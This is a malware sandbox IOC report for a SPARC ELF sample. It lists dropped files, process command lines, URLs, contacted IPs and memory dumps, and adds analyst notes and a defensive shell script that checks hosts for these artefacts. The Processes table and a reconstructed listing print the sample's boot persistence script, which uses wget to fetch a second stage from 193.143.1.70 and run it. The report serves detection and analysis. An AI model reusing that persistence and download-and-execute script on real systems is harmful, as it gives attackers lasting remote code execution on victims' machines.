IOC Report
sparc.nn.elf

Files

File Path | Type | Category | Malicious
--- | --- | --- | ---
sparc.nn.elf | ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped | initial sample | malicious
/etc/init.d/sparc.nn.elf | POSIX shell script, ASCII text executable | dropped | malicious
/etc/init.d/system | POSIX shell script, ASCII text executable | dropped | malicious
/etc/profile | ASCII text | dropped | malicious
/etc/rc.local | POSIX shell script, ASCII text executable | dropped | malicious
/boot/bootcmd | ASCII text | dropped |
/etc/inittab | ASCII text | dropped |
/etc/motd | ASCII text | dropped |
/etc/systemd/system/custom.service | ASCII text | dropped |
/memfd:snapd-env-generator (deleted) | ASCII text | dropped |
/run/user/127/dconf/user | very short file (no magic) | dropped |
/tmp/qemu-open.YvNz66 (deleted) | data | dropped |

(2 more files are hidden in the original report view.)

Only the initial sample and the first four dropped files are flagged malicious. The last three entries (the memfd-backed snapd-env-generator file, the dconf file under /run/user/127 and the qemu-open temp file) are consistent with activity of the analysis host rather than of the sample: the snapd generator, the GNOME session and the user-127 session all appear in the Processes table, and a 32-bit SPARC binary can only run on this host under the QEMU user-mode emulator, which creates /tmp/qemu-open.* files. Do not carry those three paths into detection content.

Processes

Path | Cmdline | Malicious
--- | --- | ---
/tmp/sparc.nn.elf | /tmp/sparc.nn.elf |
/tmp/sparc.nn.elf | - |
/tmp/sparc.nn.elf | - |
/bin/sh | sh -c "systemctl enable custom.service >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/systemctl | systemctl enable custom.service |
/tmp/sparc.nn.elf | - |
/bin/sh | sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/chmod | chmod +x /etc/init.d/system |
/tmp/sparc.nn.elf | - |
/bin/sh | sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/ln | ln -s /etc/init.d/system /etc/rcS.d/S99system |
/tmp/sparc.nn.elf | - |
/bin/sh | sh -c "echo \"#!/bin/sh\n# /etc/init.d/sparc.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sparc.nn.elf'\n /tmp/sparc.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sparc.nn.elf'\n killall sparc.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sparc.nn.elf" |
/tmp/sparc.nn.elf | - |
/bin/sh | sh -c "chmod +x /etc/init.d/sparc.nn.elf >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/chmod | chmod +x /etc/init.d/sparc.nn.elf |
/tmp/sparc.nn.elf | - |
/bin/sh | sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/mkdir | mkdir -p /etc/rc.d |
/tmp/sparc.nn.elf | - |
/bin/sh | sh -c "ln -s /etc/init.d/sparc.nn.elf /etc/rc.d/S99sparc.nn.elf >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/ln | ln -s /etc/init.d/sparc.nn.elf /etc/rc.d/S99sparc.nn.elf |
/tmp/sparc.nn.elf | - |
/tmp/sparc.nn.elf | - |
/tmp/sparc.nn.elf | - |
/tmp/sparc.nn.elf | - |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/lib/systemd/systemd | - |
/usr/lib/systemd/system-environment-generators/snapd-env-generator | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
/usr/libexec/gnome-session-binary | - |
/bin/sh | /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping |
/usr/libexec/gsd-housekeeping | /usr/libexec/gsd-housekeeping |
/usr/sbin/gdm3 | - |
/etc/gdm3/PrimeOff/Default | /etc/gdm3/PrimeOff/Default |
/usr/sbin/gdm3 | - |
/etc/gdm3/PrimeOff/Default | /etc/gdm3/PrimeOff/Default |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/lib/systemd/systemd | - |
/lib/systemd/systemd-user-runtime-dir | /lib/systemd/systemd-user-runtime-dir stop 127 |

(47 more processes are hidden in the original report view.)

No process is flagged in the Malicious column. The sample's own activity is the chain of /bin/sh children spawned by /tmp/sparc.nn.elf, each a persistence step: enable custom.service; make /etc/init.d/system executable and link it as /etc/rcS.d/S99system; write /etc/init.d/sparc.nn.elf and make it executable; create /etc/rc.d and link the script as /etc/rc.d/S99sparc.nn.elf. The udisksd/dumpe2fs, snapd-env-generator, gnome-session, gdm3 and systemd-user-runtime-dir entries are background activity of the analysis host.

The init script written by the echo command above, with the \n escapes expanded into lines, reads:

    #!/bin/sh
    # /etc/init.d/sparc.nn.elf

    case "$1" in
     start)
     echo 'Starting sparc.nn.elf'
     /tmp/sparc.nn.elf &
     wget http://193.143.1.70/ -O /tmp/lol.sh
     chmod +x /tmp/lol.sh
     /tmp/lol.sh &
     ;;
     stop)
     echo 'Stopping sparc.nn.elf'
     killall sparc.nn.elf
     ;;
     restart)
     $0 stop
     $0 start
     ;;
     *)
     echo "Usage: $0 {start|stop|restart}"
     exit 1
     ;;
    esac
    exit 0

On each boot the script restarts the sample from /tmp and fetches a second stage from http://193.143.1.70/ into /tmp/lol.sh, which it then runs. Two caveats when reusing this reconstruction: the \n sequences only become newlines if /bin/sh's echo interprets backslash escapes (dash does, bash by default does not), and $1 and $0 sit inside the double-quoted argument of sh -c, so the invoking shell expands them before the file is written (to an empty string and to sh respectively). The file actually dropped may therefore differ from the intended script above; compare against /etc/init.d/sparc.nn.elf as recovered from the host rather than relying on this listing.
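
As an added example, not part of the sandbox report, the following POSIX shell script turns the Files and Processes tables above into a host check: it looks for the dropped init scripts, the two rc symlinks, the custom systemd unit and any *.wants link created by systemctl enable, and greps the system files the sample overwrote (/etc/profile, /etc/rc.local, /etc/inittab, /boot/bootcmd, /etc/motd) for strings tied to this sample. The ROOT parameter, the TRIAGE_ROOT variable and the assumption that systemctl enable left a link under /etc/systemd/system/*.wants/ are mine, not the report's; the report does not show the unit's contents, so the wants check is a guess at where that link would land.

```shell
#!/bin/sh
# Added triage example for the artifacts in this report; not part of the
# sandbox output. Run as root against a live system ("/") or a mounted
# image:   TRIAGE_ROOT=/mnt/img sh triage.sh
#
# Assumptions (mine, not the report's): the ROOT parameter, and that
# "systemctl enable custom.service" left a link under /etc/systemd/system/*.wants/.

# Paths whose mere presence is suspicious: the dropped init scripts, the
# custom unit, and the rc symlinks the sample created with ln -s.
PRESENCE_PATHS="/etc/init.d/sparc.nn.elf
/etc/init.d/system
/etc/systemd/system/custom.service
/etc/rcS.d/S99system
/etc/rc.d/S99sparc.nn.elf"

# Files that exist on a clean host too; only their content is telling.
CONTENT_PATHS="/etc/profile
/etc/rc.local
/etc/inittab
/boot/bootcmd
/etc/motd"

# Strings that tie a file to this sample: the download host from the dropped
# init script, the sample name, and the staged second-stage script path.
IOC_PATTERN='193\.143\.1\.70|sparc\.nn\.elf|/tmp/lol\.sh'

# scan_persistence [ROOT]
# Prints one "FOUND <kind> <path> [-> target]" line per hit; ROOT defaults to /.
scan_persistence() {
    root="${1:-/}"
    root="${root%/}"            # "" for /, so "$root$p" always joins cleanly

    for p in $PRESENCE_PATHS; do
        f="$root$p"
        if [ -L "$f" ]; then
            # Test -L before -e: a dangling symlink is still evidence.
            printf 'FOUND symlink %s -> %s\n' "$p" "$(readlink "$f")"
        elif [ -e "$f" ]; then
            printf 'FOUND file %s\n' "$p"
        fi
    done

    for p in $CONTENT_PATHS; do
        f="$root$p"
        if [ -f "$f" ] && grep -Eq "$IOC_PATTERN" "$f" 2>/dev/null; then
            printf 'FOUND content %s\n' "$p"
        fi
    done

    # systemctl enable links the unit into a *.wants directory chosen by the
    # unit's [Install] section, which the report does not show; check them all.
    for w in "$root"/etc/systemd/system/*.wants/custom.service; do
        if [ -L "$w" ]; then
            printf 'FOUND enabled-unit %s\n' "${w#"$root"}"
        fi
    done
}

# count_findings [ROOT]: number of FOUND lines, 0 on a clean host.
count_findings() {
    scan_persistence "$1" | grep -c '^FOUND' || true
}

if [ -n "${TRIAGE_ROOT:-}" ]; then
    scan_persistence "$TRIAGE_ROOT"
fi
```

Presence and content are deliberately separate checks: /etc/profile, /etc/rc.local and /etc/motd exist on most hosts, so their existence proves nothing, whereas /etc/init.d/sparc.nn.elf, /etc/rcS.d/S99system or a symlink named /etc/rc.d/S99sparc.nn.elf have no benign reason to be there. Pointing ROOT at a mounted image lets the same checks run against a disk taken offline, which avoids trusting a possibly compromised live system.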

URLs

Name | IP | Malicious
--- | --- | ---
http://193.143.1.70/curl.sh | unknown |
http://193.143.1.70/lol.sh | unknown |
http://193.143.1.70/oro1vk/sbin/reboot/usr/sbin/reboot/bin/reboot/usr/bin/reboot/sbin/shutdown/usr/s | unknown |
http://193.143.1.70/ | unknown |

All four URLs are on the host the dropped init script fetches from with wget. The report leaves the IP column as "unknown" even though the host part is already a literal address; the third entry is cut off in the report and is reproduced here as shown.

IPs

IP | Domain | Country | Malicious
--- | --- | --- | ---
197.126.206.164 | unknown | Egypt |
165.3.234.77 | unknown | South Africa |
92.61.175.179 | unknown | France |
125.165.183.208 | unknown | Indonesia |
40.0.134.71 | unknown | United States |
47.222.229.21 | unknown | United States |
70.133.19.44 | unknown | United States |
218.217.185.195 | unknown | Japan |
172.65.2.111 | unknown | United States |
175.202.209.151 | unknown | Korea Republic of |
109.242.169.148 | unknown | Greece |
52.28.120.177 | unknown | United States |
193.159.83.158 | unknown | Germany |
212.142.207.113 | unknown | Spain |
194.224.15.156 | unknown | Spain |
88.83.212.190 | unknown | Russian Federation |
215.13.132.157 | unknown | United States |
74.243.22.51 | unknown | United States |
184.43.159.65 | unknown | United States |
7.131.247.61 | unknown | United States |
179.71.104.120 | unknown | Brazil |
5.166.22.51 | unknown | Russian Federation |
209.35.81.204 | unknown | Canada |
154.10.11.50 | unknown | Korea Republic of |
218.94.105.8 | unknown | China |
209.158.34.81 | unknown | United States |
96.219.143.18 | unknown | United States |
150.83.134.224 | unknown | Japan |
58.49.78.179 | unknown | China |
24.86.134.7 | unknown | Canada |
62.242.237.58 | unknown | Denmark |
118.174.158.46 | unknown | Thailand |
156.85.165.147 | unknown | United States |
59.189.39.92 | unknown | Singapore |
78.158.111.5 | unknown | Ireland |
9.250.131.79 | unknown | United States |
42.66.41.72 | unknown | Taiwan; Republic of China (ROC) |
208.150.214.115 | unknown | United States |
76.15.147.84 | unknown | United States |
32.47.36.218 | unknown | United States |
147.41.139.103 | unknown | Australia |
85.191.207.112 | unknown | Denmark |
207.36.200.181 | unknown | United States |
156.33.107.145 | unknown | United States |
200.177.159.156 | unknown | Brazil |
156.132.114.46 | unknown | United States |
154.197.202.163 | unknown | Seychelles |
100.205.148.193 | unknown | United States |
43.231.162.8 | unknown | China |
191.62.82.95 | unknown | Brazil |
196.5.215.169 | unknown | South Africa |
137.161.16.172 | unknown | United States |
190.164.146.1 | unknown | Chile |
156.127.163.73 | unknown | United States |
18.165.26.242 | unknown | United States |
5.166.34.53 | unknown | Russian Federation |
34.117.212.221 | unknown | United States |
209.193.143.32 | unknown | United States |
7.159.151.173 | unknown | United States |
198.65.94.173 | unknown | United States |
162.139.77.58 | unknown | Canada |
194.136.52.211 | unknown | Finland |
171.2.132.131 | unknown | Japan |
138.82.195.158 | unknown | Canada |
159.75.64.52 | unknown | China |
68.18.63.253 | unknown | United States |
74.209.148.52 | unknown | United States |
196.100.168.188 | unknown | Kenya |
26.235.152.248 | unknown | United States |
68.18.37.96 | unknown | United States |
48.170.46.20 | unknown | United States |
19.248.42.155 | unknown | United States |
65.35.50.62 | unknown | United States |
197.31.227.213 | unknown | Tunisia |
167.181.5.124 | unknown | United States |
28.211.218.186 | unknown | United States |
172.194.125.240 | unknown | Australia |
53.33.19.190 | unknown | Germany |
46.127.152.47 | unknown | Switzerland |
129.132.82.79 | unknown | Switzerland |
23.135.109.17 | unknown | Reserved |
69.122.119.52 | unknown | United States |
23.170.248.158 | unknown | Reserved |
198.196.224.149 | unknown | United States |
52.169.151.115 | unknown | United States |
77.51.110.31 | unknown | Russian Federation |
52.116.103.65 | unknown | United States |
37.38.66.124 | unknown | Kuwait |
165.206.8.63 | unknown | United States |
54.126.105.86 | unknown | United States |
174.175.11.111 | unknown | United States |
69.43.65.119 | unknown | United States |
65.200.96.197 | unknown | United States |
177.46.121.248 | unknown | Brazil |
111.39.73.150 | unknown | China |
104.153.236.219 | unknown | United States |
37.30.9.167 | unknown | Poland |
151.158.241.52 | unknown | unknown |
107.210.162.108 | unknown | United States |
200.15.173.239 | unknown | United States |

(90 more IPs are hidden in the original report view.)

None of these addresses is marked malicious and no domain resolved for any of them; the only host the sample is observed fetching from is 193.143.1.70 (URLs above), which does not appear in this list. Treat these as observed destinations, not as confirmed command-and-control, until corroborated by packet data or other reports.

Memdumps

Base Address | Regiontype | Protect | Malicious
--- | --- | --- | ---
7fda0002d000 | | page execute read | malicious
7fda0002d000 | | page execute read | malicious
7fdb0891a000 | | page read and write |
7fdb07f4b000 | | page read and write |
558068025000 | | page read and write |
7ffdbb278000 | | page read and write |
7fdb0891a000 | | page read and write |
55806a043000 | | page read and write |
7fdb07748000 | | page read and write |
7ffdbb3ed000 | | page execute read |
7fdb08a4b000 | | page read and write |
7fdb085aa000 | | page read and write |
7fda00042000 | | page read and write |
7fdb08a43000 | | page read and write |
7fdb08a43000 | | page read and write |
7ffdbb3ed000 | | page execute read |
7fda00042000 | | page read and write |
55806b159000 | | page read and write |
7fdb00021000 | | page read and write |
7fdb07f4b000 | | page read and write |
7fdb00021000 | | page read and write |
558067df7000 | | page execute read |
7fdb07748000 | | page read and write |
7fdb081e8000 | | page read and write |
7fdb00000000 | | page read and write |
7fdb085cf000 | | page read and write |
55806802e000 | | page read and write |
7fdb081e8000 | | page read and write |
7fdb085cf000 | | page read and write |
55806802e000 | | page read and write |
7fda0003e000 | | page read and write |
7fdb00000000 | | page read and write |
7fda0003e000 | | page read and write |
7ffdbb278000 | | page read and write |
558067df7000 | | page execute read |
55806a02c000 | | page execute and read and write |
7fdb08a4b000 | | page read and write |
7fdb07f59000 | | page read and write |
7fdb08a90000 | | page read and write |
7fdb07f59000 | | page read and write |
7fdb08a90000 | | page read and write |
55806a043000 | | page read and write |
55806a02c000 | | page execute and read and write |
55806b159000 | | page read and write |
7fdb085aa000 | | page read and write |
7fda00047000 | | page read and write |
558068025000 | | page read and write |

(37 more memdumps are hidden in the original report view.)

The report leaves the Regiontype column empty for every dump. The only region flagged malicious is the execute-read page at 7fda0002d000, dumped twice; the same address appearing more than once reflects repeated dumps of one region, not separate mappings. The base addresses are 64-bit x86-64 user-space ranges (0x55... and 0x7f...), not 32-bit SPARC addresses, so these dumps come from the process that ran the sample on the analysis host (see the qemu-open file in the Files table); offsets inside them should not be read as addresses in the SPARC binary itself.